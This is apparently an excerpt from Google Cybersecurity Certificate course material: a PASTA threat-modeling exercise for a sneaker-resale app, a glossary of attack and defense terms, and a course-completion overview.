technologies that it uses:
●
●
●
●
Application programming interface (API): An API is a set of rules that define how software
components interact with each other. In application development, third-party APIs are
commonly used to add functionality without having to program it from scratch.
Public key infrastructure (PKI): PKI is an encryption framework that secures the exchange of
online information. The mobile app uses a combination of symmetric and asymmetric
encryption algorithms: AES and RSA. AES encryption is used to encrypt sensitive data, such as
credit card information. RSA encryption is used to exchange keys between the app and a user's
device.
SHA-256: SHA-256 is a commonly used hash function that takes an input of any length and
produces a digest of 256 bits. The sneaker app will use SHA-256 to protect sensitive user data,
like passwords and credit card numbers.
Structured query language (SQL): SQL is a programming language used to create, interact with,
and request information from a database. For example, the mobile app uses SQL to store
information about the sneakers that are for sale, as well as the sellers who are selling them. It
also uses SQL to access that data during a purchase.
Consider what you've learned about these technologies:
●
Which of these technologies would you evaluate first? How might they present risks from a
security perspective?
In the Stage II row of the PASTA worksheet, write 2-3 sentences (40-60 words) that describe why you
choose to prioritize that technology over the others.
Step 3: Review a data flow diagram
During Stage III of PASTA, the objective is to analyze how the application is handling information. Here,
each process is broken down.
For example, one of the app's processes might be to allow buyers to search the database for shoes that
are for sale.
Open the PASTA data flow diagram resource. Review the diagram and consider how the technologies you
evaluated relate to protecting user data in this process.
Note: Software developers usually have detailed data flow diagrams available for security teams to use
and verify that information is being processed securely.
Step 4: Use an attacker mindset to analyze potential threats
Stage IV is about identifying potential threats to the application. This includes threats to the
technologies you listed in Stage II. It also concerns the processes of your data flow diagram from Stage
III.
For example, the apps authentication system could be attacked with a virus. Authentication could also
be attacked if a threat actor social engineers an employee.
In the Stage IV row of the PASTA worksheet, list 2 types of threats that are risks to the information being
handled by the sneaker company's app.
Pro tip: Internal system logs that you will use as a security analyst are good sources of threat intel
Step 5: List vulnerabilities that can be exploited by those threats
Stage V of PASTA is the vulnerability analysis. Here, you need to consider the attack surface of the
technologies listed in Stage II.
For example, the app will use a payment system. The form used to collect credit card information might
be vulnerable if it fails to encrypt data.
In Stage V of the PASTA worksheet, list 2 types of vulnerabilities that could be exploited.
Pro tip: Resources like the CVE® list and OWASP are useful for finding common software vulnerabilities.
Step 6: Map assets, threats, and vulnerabilities to an attack tree
In Stage VI of PASTA, the information gathered in the previous two steps are used to build an attack tree.
Open the PASTA attack tree resource. Review the diagram and consider how threat actors can
potentially exploit these attack vectors.
Note: Applications like this normally have large, complex attack trees with many branches.
Step 7: Identify new security controls that can reduce risk
PASTA threat modeling is commonly used to reduce the likelihood of security risks. In Stage VII, the final
goal is to implement defenses and safeguards that mitigate threats.
In Stage VII of the PASTA worksheet, list 4 security controls that you have learned about that can reduce
the chances of a security incident, like a data breach.
What to Include in Your Response
Be sure to address the following elements in your completed activity:
●
●
●
●
●
2-3 business objectives
2-3 technology requirements
2 potential threats
2 system vulnerabilities
4 defenses that limit risk
●
Glossary terms from module 4
●
●
●
●
●
●
●
●
Terms and definitions from Course 5, Module 4
Angler phishing: A technique where attackers impersonate customer service representatives on
social media
Advanced persistent threat (APT): Instances when a threat actor maintains unauthorized access
to a system for an extended period of time
Adware: A type of legitimate software that is sometimes used to display digital advertisements
in applications
Attack tree: A diagram that maps threats to assets
Baiting: A social engineering tactic that tempts people into compromising their security
Botnet: A collection of computers infected by malware that are under the control of a single
threat actor, known as the “bot-herder"
Cross-site scripting (XSS): An injection attack that inserts code into a vulnerable website or web
application
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
Cryptojacking: A form of malware that installs software to illegally mine cryptocurrencies
DOM-based XSS attack: An instance when malicious script exists in the webpage a browser loads
Dropper: A type of malware that comes packed with malicious code which is delivered and
installed onto a target system
Fileless malware: Malware that does not need to be installed by the user because it uses
legitimate programs that are already installed to infect a computer
Hacker: Any person or group who uses computers to gain unauthorized access to data
Identity and access management (IAM): A collection of processes and technologies that helps
organizations manage digital identities in their environment
Injection attack: Malicious code inserted into a vulnerable application
Input validation: Programming that validates inputs from users and other programs
Intrusion detection system (IDS): An application that monitors system activity and alerts on
possible intrusions
Loader: A type of malware that downloads strains of malicious code from an external source and
installs them onto a target system
Malware: Software designed to harm devices or networks
Process of Attack Simulation and Threat Analysis (PASTA): A popular threat modeling framework
that’s used across many industries
Phishing: The use of digital communications to trick people into revealing sensitive data or
deploying malicious software
Phishing kit: A collection of software tools needed to launch a phishing campaign
Prepared statement: A coding technique that executes SQL statements before passing them onto
the database
Potentially unwanted application (PUA): A type of unwanted software that is bundled in with
legitimate programs which might display ads, cause device slowdown, or install other software
Quid pro quo: A type of baiting used to trick someone into believing that they’ll be rewarded in
return for sharing access, information, or money
Ransomware: Type of malicious attack where attackers encrypt an organization’s data and
demand payment to restore access
Reflected XSS attack: An instance when malicious script is sent to a server and activated during
the server’s response
Rootkit: Malware that provides remote, administrative access to a computer
Scareware: Malware that employs tactics to frighten users into infecting their device
Smishing: The use of text messages to trick users to obtain sensitive information or to
impersonate a known source
Social engineering: A manipulation technique that exploits human error to gain private
information, access, or valuables
Spear phishing: A malicious email attack targeting a specific user or group of users, appearing to
originate from a trusted source
Spyware: Malware that’s used to gather and sell information without consent
SQL (Structured Query Language): A programming language used to create, interact with, and
request information from a database
SQL injection: An attack that executes unexpected queries on a database
Stored XSS attack: An instance when malicious script is injected directly on the server
Tailgating: A social engineering tactic in which unauthorized people follow an authorized person
into a restricted area
Threat: Any circumstance or event that can negatively impact assets
Threat actor: Any person or group who presents a security risk
Threat modeling: The process of identifying assets, their vulnerabilities, and how each is
exposed to threats
Trojan horse: Malware that looks like a legitimate file or program
●
●
●
●
Vishing: The exploitation of electronic voice communication to obtain sensitive information or to
impersonate a known source
Watering hole attack: A type of attack when a threat actor compromises a website frequently
visited by a specific group of users
Whaling: A category of spear phishing attempts that are aimed at high-ranking executives in an
organization
Web-based exploits: Malicious code or behavior that’s used to take advantage of coding flaws in
a web application
Get started on the next course
Congratulations on completing Course 5 of the Google Cybersecurity Certificate: Assets, Threats, and
Vulnerabilities! In this part of the program, you learned about assets and how they are protected. You
also developed an attacker mindset by exploring the common security controls used to mitigate
vulnerabilities and defend against threats.
The Google Cybersecurity Certificate has eight courses:
1. Foundations of Cybersecurity — Explore the cybersecurity profession, including significant
events that led to the development of the cybersecurity field and its continued importance to
organizational operations. Learn about entry-level cybersecurity roles and responsibilities.
2. Play It Safe: Manage Security Risks — Identify how cybersecurity professionals use frameworks
and controls to protect business operations, and explore common cybersecurity tools.
3. Connect and Protect: Networks and Network Security — Gain an understanding of network-level
vulnerabilities and how to secure networks.
4. Tools of the Trade: Linux and SQL — Explore foundational computing skills, including
communicating with the Linux operating system through the command line and querying
databases with SQL.
5. Assets, Threats, and Vulnerabilities — Learn about the importance of security controls and
developing a threat actor mindset to protect and defend an organization’s assets from various
threats, risks, and vulnerabilities. (This is the course you just completed. Well done!)
6. Sound the Alarm: Detection and Response — Understand the incident response lifecycle and
practice using tools to detect and respond to cybersecurity incidents.
7. Automate Cybersecurity Tasks with Python — Explore the Python programming language and
write code to automate cybersecurity tasks.
8. Put It to Work: Prepare for Cybersecurity Jobs — Learn about incident classificatio
Download